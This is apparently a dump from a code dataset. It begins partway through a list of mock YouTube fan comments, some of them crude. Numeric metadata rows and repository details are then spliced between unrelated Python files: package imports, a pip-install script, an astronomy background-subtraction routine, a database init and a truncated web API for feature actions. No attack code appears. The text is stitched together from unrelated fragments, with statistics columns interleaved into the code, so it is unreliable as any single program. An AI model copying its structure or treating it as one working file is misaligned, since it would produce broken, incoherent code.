Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzreDMwlepx-hd2mU5f4FCqT7Iall-AJoloA-9c=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 4045, 'authorDisplayName': 'P Elnerud', 'commentDatePosted': datetime.datetime(2015, 12, 2, 22, 33, 24), 'commentID': 25839, 'textDisplay': 'Yesss!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzvOmnTsA91zWviyECT-sft2g_WlxThvvLP_m1oNuc=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3974, 'authorDisplayName': 'David Lang', 'commentDatePosted': datetime.datetime(2015, 10, 24, 10, 21, 14), 'commentID': 25933, 'textDisplay': 'Delightful! Tasty Bones!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJymZVZeOBTgKkSaRTWFlQBw6nGuHgWE1HkmekCvww=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14141, 'authorDisplayName': 'Junkmech', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 27, 40), 'commentID': 25858, 'textDisplay': 'Let the panties hit the floor.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJx4rJMozMawnopW_TwtW0d9YZ5f-551Xyh0Dw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13065, 'authorDisplayName': 'gml4', 'commentDatePosted': datetime.datetime(2015, 10, 24, 17, 6, 20), 'commentID': 25926, 'textDisplay': 'Wait a minute... I can only like this once?! This made me super happy to see you working with my favorite youtube trombonist... great collaboration. This one completely justifies my opinion that you are a very talented musician Matt.... thank you for sharing this, and all that you do.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJz90VfgUZwHDDtihzUX_yTWMYdSf_dIx3O5Rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 12780, 'authorDisplayName': 'mynameismatt2010', 'commentDatePosted': datetime.datetime(2015, 12, 1, 1, 6, 46), 'commentID': 25846, 'textDisplay': "Awesome as always Matt! I'm wondering if you're planning on continuing to move more towards these more serious covers or if there will be more comedy videos to come? Either way your videos are always great!", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwgwf9bW8WM46uEg8ECRCuDD18Is4usviCrZCHv3g=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3945, 'authorDisplayName': 'Michelle Karbon', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 2, 1), 'commentID': 25859, 'textDisplay': "You're so awesome! I love this and we need another recorder by candlelight soon!", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyVben0E203Z_mgaX3OJ1s2QNgp3u5QcG21S_l2Jg=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13453, 'authorDisplayName': 'Brigitta Sz.', 'commentDatePosted': datetime.datetime(2015, 10, 25, 6, 53, 34), 'commentID': 25916, 'textDisplay': 'Még mindig szuper hangod van :) jó lett a klip! BYEEEEEE XD', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxnXmg4gIIRFy0PYKwS-Eb2400IR8Vwaj0Oow=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13747, 'authorDisplayName': 'shikumaru55', 'commentDatePosted': datetime.datetime(2015, 10, 24, 11, 23, 13), 'commentID': 25930, 'textDisplay': "So you're not dead?", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}]
mock_growth = [{'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyK4xg31xlsnsA6SWZM_4XFBqKCvSzFp48kyhOaTHs=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15213, 'authorDisplayName': 'kate ramsay', 'commentDatePosted': datetime.datetime(2015, 10, 24, 17, 53, 29), 'commentID': 25925, 'textDisplay': 'this is one of my favourite songs', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxhGNURpsRc4-wZa3PQwcmWOnq4K7fPTqjx53vb=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15179, 'authorDisplayName': 'Rowdy Mouse', 'commentDatePosted': datetime.datetime(2015, 11, 30, 13, 51), 'commentID': 25869, 'textDisplay': "One time Matt sang happy birthday to my girlfriend Esiri over the internet.\nThanks for that btw Matt. I've never been laid so hard in my life. Although she did yell your name a couple of times, hope you don't mind.", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzuzD3xT6MChz0e5AV4Ii3hoc3zSFQT3-vbQ7Fx4g=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15185, 'authorDisplayName': 'VeXeBB', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 4, 6), 'commentID': 25879, 'textDisplay': 'I wish you were my vocal coach! Awesome Matt!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxd4wuBKZG4164EE1PQ2XjME6Q5WsuJ_MsfCA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15211, 'authorDisplayName': 'Sporky0', 'commentDatePosted': datetime.datetime(2015, 10, 24, 22, 40, 8), 'commentID': 25920, 'textDisplay': "Love your videos Matt, always have. But it might just be me but the echo/reverb (whatever it was) on the voice was kinda annoying. It overshadowed your vocals and I found it difficult to listen to. \nI'm not trying to shit on you or the video, just sharing my opinion.", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxLREJhsl7hGohv5C3S-zQWmDVnqFUOGFLTepE43w=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15171, 'authorDisplayName': 'Meaghan Kalinowski', 'commentDatePosted': datetime.datetime(2015, 12, 1, 0, 54, 18), 'commentID': 25847, 'textDisplay': 'labyrinth', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwmB3fa5sJSlOT35rkWCVfZn85qwy_qsrY_u3AJ=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15205, 'authorDisplayName': 'Remelox', 'commentDatePosted': datetime.datetime(2015, 10, 28, 21, 44, 58), 'commentID': 25909, 'textDisplay': 'Nice to get this but upset to lose the How Long Can You Dance video.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyQbxJvL7rI8ulO3sXbDFwNTbio_nveIEFPpJ4nmA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15208, 'authorDisplayName': 'William Bravo', 'commentDatePosted': datetime.datetime(2015, 10, 26, 5, 2, 36), 'commentID': 25914, 'textDisplay': 'Magnificent.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwS6b29q2hYR3LwRXHMJgtnukIDXL-jjBYv2_KF=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15203, 'authorDisplayName': 'farLander', 'commentDatePosted': datetime.datetime(2015, 10, 30, 2, 31, 56), 'commentID': 25907, 'textDisplay': 'Tbone powah!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJz142JGiEAJ7aBU42K8fLibtk4sgyDgHL1O5Lv3eQ=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15209, 'authorDisplayName': 'ShakSterTV', 'commentDatePosted': datetime.datetime(2015, 10, 26, 4, 18, 36), 'commentID': 25915, 'textDisplay': 'Amazing job man', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzZmF4kIDwWj79mCi-iUAVzuIiGihXaKKIL4GP-JA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15221, 'authorDisplayName': 'Joon Nam', 'commentDatePosted': datetime.datetime(2015, 10, 24, 7, 56, 1), 'commentID': 25942, 'textDisplay': 'first', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}]
| 2,043.7
| 5,269
| 0.73274
| 2,729
| 20,437
| 5.444119
| 0.144742
| 0.043077
| 0.059231
| 0.072693
| 0.951067
| 0.948442
| 0.940163
| 0.937269
| 0.935451
| 0.935451
| 0
| 0.072921
| 0.102853
| 20,437
| 10
| 5,270
| 2,043.7
| 0.737388
| 0
| 0
| 0
| 0
| 9.8
| 0.716557
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
11d27e1b2e27346fdb81516797d014b964e4badd
| 103
|
py
|
Python
|
triangle_multiplicative_module/__init__.py
|
lucidrains/triangle-multiplicative-module
|
23a739a71ed2e381e660c7756a72408074746d2a
|
[
"MIT"
] | 16
|
2021-07-19T17:54:55.000Z
|
2022-02-18T19:02:23.000Z
|
triangle_multiplicative_module/__init__.py
|
lucidrains/triangle-multiplicative-module
|
23a739a71ed2e381e660c7756a72408074746d2a
|
[
"MIT"
] | 2
|
2021-07-22T03:34:07.000Z
|
2021-08-03T05:18:24.000Z
|
triangle_multiplicative_module/__init__.py
|
lucidrains/triangle-multiplicative-module
|
23a739a71ed2e381e660c7756a72408074746d2a
|
[
"MIT"
] | 1
|
2021-07-23T01:11:15.000Z
|
2021-07-23T01:11:15.000Z
|
from triangle_multiplicative_module.triangle_multiplicative_module import TriangleMultiplicativeModule
| 51.5
| 102
| 0.951456
| 9
| 103
| 10.444444
| 0.666667
| 0.468085
| 0.595745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038835
| 103
| 1
| 103
| 103
| 0.949495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
11d63a7525e2e81170955f16175d7636a2fe3eca
| 104
|
py
|
Python
|
emcee_install.py
|
bblais/Python-for-Science
|
abe28ddb5748ef9ecdceda77a01352e21d3a675b
|
[
"MIT"
] | null | null | null |
emcee_install.py
|
bblais/Python-for-Science
|
abe28ddb5748ef9ecdceda77a01352e21d3a675b
|
[
"MIT"
] | null | null | null |
emcee_install.py
|
bblais/Python-for-Science
|
abe28ddb5748ef9ecdceda77a01352e21d3a675b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
os.system('pip install emcee')
os.system('pip install triangle_plot')
| 14.857143
| 38
| 0.740385
| 17
| 104
| 4.470588
| 0.705882
| 0.210526
| 0.289474
| 0.473684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 104
| 6
| 39
| 17.333333
| 0.826087
| 0.192308
| 0
| 0
| 0
| 0
| 0.512195
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
eea2406ad765d1796de9d6f27d8c4437b17ec5cf
| 241
|
py
|
Python
|
danube_delta/plugins/__init__.py
|
honzajavorek/danube-delta
|
da91bf8a9ed4018e4f5e6055b88ce81b32be6dc3
|
[
"MIT"
] | 6
|
2017-04-25T09:15:07.000Z
|
2018-04-26T08:15:30.000Z
|
danube_delta/plugins/__init__.py
|
honzajavorek/danube-delta
|
da91bf8a9ed4018e4f5e6055b88ce81b32be6dc3
|
[
"MIT"
] | 36
|
2016-03-03T07:48:56.000Z
|
2021-06-25T15:18:37.000Z
|
danube_delta/plugins/__init__.py
|
honzajavorek/danube-delta
|
da91bf8a9ed4018e4f5e6055b88ce81b32be6dc3
|
[
"MIT"
] | 4
|
2016-08-26T08:37:46.000Z
|
2018-02-25T06:52:13.000Z
|
from . import (
code_blocks, headings, plain_summary, featured_image, media, tables,
authors, outdated_article,
)
PLUGINS = [
code_blocks, headings, plain_summary, featured_image, media, tables,
authors, outdated_article
]
| 21.909091
| 72
| 0.73444
| 27
| 241
| 6.259259
| 0.555556
| 0.118343
| 0.213018
| 0.272189
| 0.899408
| 0.899408
| 0.899408
| 0.899408
| 0.899408
| 0.899408
| 0
| 0
| 0.178423
| 241
| 10
| 73
| 24.1
| 0.853535
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eeb5fa3d13a776296677e062d9e4e6743ddb17ae
| 46
|
py
|
Python
|
Blackjaw120/utils/oold_flag.py
|
Gitr007/CTFChalls
|
ccd4f8ce472e53b5cc518389807264418d008ea6
|
[
"Apache-2.0"
] | 1
|
2019-01-21T21:02:00.000Z
|
2019-01-21T21:02:00.000Z
|
Blackjaw120/utils/oold_flag.py
|
Gitr007/CTFChalls
|
ccd4f8ce472e53b5cc518389807264418d008ea6
|
[
"Apache-2.0"
] | null | null | null |
Blackjaw120/utils/oold_flag.py
|
Gitr007/CTFChalls
|
ccd4f8ce472e53b5cc518389807264418d008ea6
|
[
"Apache-2.0"
] | null | null | null |
import sys
# TODO : add new_flag.py file
| 11.5
| 31
| 0.652174
| 8
| 46
| 3.625
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.282609
| 46
| 3
| 32
| 15.333333
| 0.878788
| 0.586957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0148eecf166abcfed60cf9a2beae4d149333792d
| 3,506
|
py
|
Python
|
est_bkg.py
|
jasminwash/hostgal
|
b87f100b783e50741654daca1fb48acb18a6efbf
|
[
"MIT"
] | null | null | null |
est_bkg.py
|
jasminwash/hostgal
|
b87f100b783e50741654daca1fb48acb18a6efbf
|
[
"MIT"
] | null | null | null |
est_bkg.py
|
jasminwash/hostgal
|
b87f100b783e50741654daca1fb48acb18a6efbf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 15 20:12:52 2018
@author: Dartoon
"""
import numpy as np
from astropy.visualization import SqrtStretch
from astropy.stats import SigmaClip
from photutils import Background2D, SExtractorBackground
from astropy.visualization.mpl_normalize import ImageNormalize
from photutils import make_source_mask
import matplotlib.pyplot as plt
norm = ImageNormalize(stretch=SqrtStretch())
def est_bkg(image, pltshow=1):
print("Estimating the background light......")
img = image # check the back grounp
sigma_clip = SigmaClip(sigma=3., iters=10)
bkg_estimator = SExtractorBackground()
mask_0 = make_source_mask(img, snr=2, npixels=5, dilate_size=11)
mask_1 = (np.isnan(img))
mask = mask_0 + mask_1
bkg = Background2D(img, (50, 50), filter_size=(3, 3),
sigma_clip=sigma_clip, bkg_estimator=bkg_estimator,
mask=mask)
from matplotlib.colors import LogNorm
fig=plt.figure(figsize=(15,15))
ax=fig.add_subplot(1,1,1)
ax.imshow(img, norm=LogNorm(), origin='lower')
#bkg.plot_meshes(outlines=True, color='#1f77b4')
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
if pltshow == 0:
plt.close()
else:
plt.show()
fig=plt.figure(figsize=(15,15))
ax=fig.add_subplot(1,1,1)
ax.imshow(mask, origin='lower')
#bkg.plot_meshes(outlines=True, color='#1f77b4')
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
if pltshow == 0:
plt.close()
else:
plt.show()
back = bkg.background* ~mask_1
fig=plt.figure(figsize=(15,15))
ax=fig.add_subplot(1,1,1)
ax.imshow(back, origin='lower', cmap='Greys_r')
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
if pltshow == 0:
plt.close()
else:
plt.show()
# img -= back
# pyfits.PrimaryHDU(img).writeto('sub_coadd.fits',overwrite=True)
return back
def sub_bkg(img, plot=True):
from astropy.stats import SigmaClip
from photutils import Background2D, SExtractorBackground
sigma_clip = SigmaClip(sigma=3., iters=10)
bkg_estimator = SExtractorBackground()
from photutils import make_source_mask
mask_0 = make_source_mask(img, snr=2, npixels=5, dilate_size=11)
mask_1 = (np.isnan(img))
mask = mask_0 + mask_1
bkg = Background2D(img, (50, 50), filter_size=(3, 3),
sigma_clip=sigma_clip, bkg_estimator=bkg_estimator,
mask=mask)
from matplotlib.colors import LogNorm
fig=plt.figure(figsize=(15,15))
ax=fig.add_subplot(1,1,1)
ax.imshow(img, norm=LogNorm(), origin='lower')
#bkg.plot_meshes(outlines=True, color='#1f77b4')
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
if plot:
plt.show()
else:
plt.close()
fig=plt.figure(figsize=(15,15))
ax=fig.add_subplot(1,1,1)
ax.imshow(mask, origin='lower')
#bkg.plot_meshes(outlines=True, color='#1f77b4')
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
if plot:
plt.show()
else:
plt.close()
back = bkg.background* ~mask_1
fig=plt.figure(figsize=(15,15))
ax=fig.add_subplot(1,1,1)
ax.imshow(back, origin='lower', cmap='Greys_r')
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
if plot:
plt.show()
else:
plt.close()
return img-back, back
| 32.462963
| 74
| 0.646606
| 490
| 3,506
| 4.5
| 0.226531
| 0.010884
| 0.081633
| 0.051701
| 0.806349
| 0.806349
| 0.776417
| 0.776417
| 0.776417
| 0.776417
| 0
| 0.042522
| 0.221905
| 3,506
| 107
| 75
| 32.766355
| 0.765762
| 0.113805
| 0
| 0.879121
| 0
| 0
| 0.026239
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021978
| false
| 0
| 0.131868
| 0
| 0.175824
| 0.010989
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
014cd938df7acd797b5e1fe7fded15f5616f5467
| 139
|
py
|
Python
|
sb3_contrib/ppo_mask/__init__.py
|
glmcdona/stable-baselines3-contrib
|
91f9b1ed34fbaa9243a044ea67aa4c677663bfc2
|
[
"MIT"
] | null | null | null |
sb3_contrib/ppo_mask/__init__.py
|
glmcdona/stable-baselines3-contrib
|
91f9b1ed34fbaa9243a044ea67aa4c677663bfc2
|
[
"MIT"
] | null | null | null |
sb3_contrib/ppo_mask/__init__.py
|
glmcdona/stable-baselines3-contrib
|
91f9b1ed34fbaa9243a044ea67aa4c677663bfc2
|
[
"MIT"
] | null | null | null |
from sb3_contrib.ppo_mask.policies import CnnPolicy, MlpPolicy # , MultiInputPolicy
from sb3_contrib.ppo_mask.ppo_mask import MaskablePPO
| 46.333333
| 84
| 0.856115
| 19
| 139
| 6
| 0.578947
| 0.184211
| 0.245614
| 0.298246
| 0.368421
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.093525
| 139
| 2
| 85
| 69.5
| 0.888889
| 0.129496
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0169dc5e6ada8a0a13c034f84a918a3a99196f3a
| 178
|
py
|
Python
|
graphvl/db/init_db.py
|
verifid/graph-vl
|
7062e0e0fa7de3e1ce0598cd7c8f0e74e6355e9e
|
[
"MIT"
] | 27
|
2020-04-04T12:08:48.000Z
|
2021-12-28T23:07:19.000Z
|
graphvl/db/init_db.py
|
verifid/graph-vl
|
7062e0e0fa7de3e1ce0598cd7c8f0e74e6355e9e
|
[
"MIT"
] | null | null | null |
graphvl/db/init_db.py
|
verifid/graph-vl
|
7062e0e0fa7de3e1ce0598cd7c8f0e74e6355e9e
|
[
"MIT"
] | 3
|
2021-01-22T19:03:15.000Z
|
2021-07-20T16:11:56.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from graphvl.db.base_class import Base
from graphvl.db.session import engine
def init_db():
Base.metadata.create_all(engine)
| 17.8
| 38
| 0.719101
| 28
| 178
| 4.464286
| 0.714286
| 0.176
| 0.208
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006536
| 0.140449
| 178
| 9
| 39
| 19.777778
| 0.810458
| 0.235955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
016d9d3f72dceea921c160eca82a212ad42275db
| 14,295
|
py
|
Python
|
src/hielen2/api/actions.py
|
fantamodeman/hielen2
|
b1b249f4bd7609b3977777f663ae242adf69cfe2
|
[
"MIT"
] | null | null | null |
src/hielen2/api/actions.py
|
fantamodeman/hielen2
|
b1b249f4bd7609b3977777f663ae242adf69cfe2
|
[
"MIT"
] | null | null | null |
src/hielen2/api/actions.py
|
fantamodeman/hielen2
|
b1b249f4bd7609b3977777f663ae242adf69cfe2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
import hug
import tempfile
import falcon
import os
import time
import json
from hielen2 import db, conf
import hielen2.source as sourceman
from streaming_form_data import StreamingFormDataParser
from streaming_form_data.targets import FileTarget, ValueTarget
from himada.api import ResponseFormatter
from urllib.parse import unquote
from importlib import import_module
from pathlib import Path, PosixPath
import traceback
@hug.get("/{feature}")
def features_actions_values(feature, actions=None, timestamp=None, request=None, response=None):
"""
**Recupero dello stato corrente delle azioni effettuate su una feature**
L'intento di questa api è quello di fornire i valori richiesti secondo lo schema dell'azione
___nota 1___: `actions` accetta valori multipli separati da virgola
___nota 2___: A seconda dell'action richiesta, alcuni parametri potrebbero essere utilizzati in fase \
di input ma non registrati. Il che vuol dire che per quei parametri il valore di ritorno sarà null
viene restituito una struttura di questo tipo:
[
{ "feature"*:...,
"action_name*":...,
"timestamp": ...,
"value":{...}
},
{ "feature"*:...,
"action_name*":...,
"timestamp": ...,
"value":{...}
},
...
]
___nota 3___ :(*) I campi "feature" e "action" potrebbero non essere restituiti nella struttura \
nel caso in cui essi risultino non ambigui. "timestamp" e "value" vengono sempre restituiti
Possibili risposte:
- _404 Not Found_: Nel non venga trovata la feature richiesta o essa abbia un problema di \
configurazione
"""
out = ResponseFormatter()
# Trying to manage income feature request and its prototype configuration
try:
featobj = sourceman.sourceFactory(feature)
out.data = featobj.getActionValues(actions,timestamp)
if not isinstance(out.data,list):
out.data=[out.data]
except Exception as e:
traceback.print_exc()
out.status = falcon.HTTP_NOT_FOUND
out.message = f"feature '{feature}' does not exists or it is misconfigured: {e}"
out.format(request=request, response=response)
return
out.format(request=request, response=response)
return
@hug.get("/{feature}/{action}")
def feature_action_values(feature, action, timestamp=None, request=None, response=None):
"""
**Recupero dello stato corrente per una specifica azione di una specifica feature**"""
return features_actions_values(feature, action, timestamp, request=request, response=response)
@hug.delete("/{feature}/{action}")
def feature_action_delete(feature,action,timestamp,request=None,response=None):
"""
**Eliminazione di una determinata azione di una specifica feature**"""
out = ResponseFormatter()
# Trying to manage income feature request and its prototype configuration
try:
featobj = sourceman.sourceFactory(feature)
out.data = featobj.deleteActionValues(action,timestamp)
except Exception as e:
traceback.print_exc()
out.status = falcon.HTTP_NOT_FOUND
out.message = f"feature '{feature}' does not exists or it is misconfigured: {e}"
out.format(request=request, response=response)
return
out.format(request=request, response=response)
return
@hug.post("/{feature}/{action}", parse_body=False)
@hug.default_input_format(content_type="multipart/form-data")
def make_action(feature, action, request=None, response=None):
"""
**Esecuzione delle azioni**
Richiede l'esecuzione di una specifica azione su una feature, fornendo tutte le informazioni \
necessarie attraverso una form dinamica dedicata.
- Oltre ai due parametri `feature` e `form`, `timestamp`, indicati nella url, accetta un \
_multipart/form-data_ basato sulla specifica form, selezionata tramite i due parametri espliciti.
- Tutto il content è scaricato attarverso i chunk dello stream ('100 continue') per evitare il \
timeout dei workers in caso di contenuti di grandi dimensioni.
Possibili risposte:
- _200 OK_: Nel caso in cui l'azione vada a buon fine. L'azione richiesta viene presa in carico ma \
potrebbe avere un tempo di esecuzione arbitrario. L'azione quindi viene splittata su un altro processo.
- _404 Not Found_: Nel caso la feature non esista o non sia definita per essa l'azione richiesta.
- _500 Internal Server Error_: Nel caso pessimo che il modulo dichiarato non esista.
- _501 Not Implemented'_: Nel caso la tipologia non fornisse ancora l'iplementazione di uno o tutti \
i moduli di gestione
E' stato implementato il meccanismo minimo di gestione che prevede il salvataggio delle info \
fornite che possono essere fornite tali e quali in uscita (vedi metodo GET dell'api). Questo \
meccanismo permette di svluppare i moduli a partire da un template con risposta di default.
"""
out = ResponseFormatter()
# Trying to manage income feature request and its prototype configuration
try:
featobj = sourceman.sourceFactory(feature)
except KeyError as e:
traceback.print_exc()
out.status = falcon.HTTP_NOT_FOUND
out.message = f"feature '{feature}' does not exists or it is misconfigured: {e}"
out.format(request=request, response=response)
return
try:
schema=featobj.getActionSchema(action)
except KeyError as e:
traceback.print_exc()
out.status = falcon.HTTP_NOT_IMPLEMENTED
out.message = f"Prototype '{featobj.type}' actions not implemented."
out.format(request=request, response=response)
return
except ModuleNotFoundError as e:
traceback.print_exc()
out.status = falcon.HTTP_INTERNAL_SERVER_ERROR
out.message = f"Prototype '{featobj.type}' module not found."
out.format(request=request, response=response)
return
parser = StreamingFormDataParser(headers=request.headers)
values = {}
toremove = []
# TODO Differenziazione delle tipologie di input
for k, w in schema["fields"].items():
if w == "LocalFile":
timenow = time.perf_counter()
filepath = Path(
tempfile.gettempdir(), f"{feature}.{k}.{timenow}.part"
)
target = FileTarget(filepath)
